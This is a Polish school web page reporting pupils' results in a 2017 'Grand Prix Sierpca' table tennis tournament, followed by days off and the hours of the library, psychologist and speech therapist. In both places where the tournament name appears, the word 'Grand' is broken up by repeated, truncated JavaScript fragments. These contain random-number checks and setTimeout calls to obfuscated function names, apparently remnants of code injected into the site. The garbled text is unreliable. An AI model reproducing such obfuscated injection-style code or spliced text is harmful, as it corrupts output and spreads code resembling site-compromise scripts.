I Grdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}and Prix Sierpca w Tenisie Stołowym

W sobotę 25 marca 2017 roku zostały rozpoczęte rozgrywki  pierwszego turnieju „Grdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}and Prix Sierpca w Tenisie Stołowym”. Cykl obejmuje 6 turniejów (3 na wiosnę i 3 na jesieni). Dla najlepszych przewidziane są atrakcyjne nagrody.

Tenisistki z naszej szkoły pod opieką trenerki  Katarzyny Dyja zagrały w kategorii szkoły podstawowe i osiągnęły następujące wyniki:

I miejsce – Michalina Topolewska

II miejsce – Natalia Lejman

III miejsce – Kinga Kozłowska

IV miejsce – Maja Lejman

Gratulujemy dziewczętom i życzymy dalszych sukcesów!

Dni wolne

2 listopada 2017
3 listopada 2017
21 grudnia 2017
22 grudnia 2017
30 kwietnia 2018
2 maja 2018
4 maja 2018
1 czerwca 2018

Biblioteka szkolna

Poniedziałek 13.15 – 14.15
Środa 12.45 – 13.45

Psycholog

Środa 7.30 – 10.30

Logopeda

Wtorek 7.30 – 8.00
13.30 – 14.30
Środa 13.00 – 13.30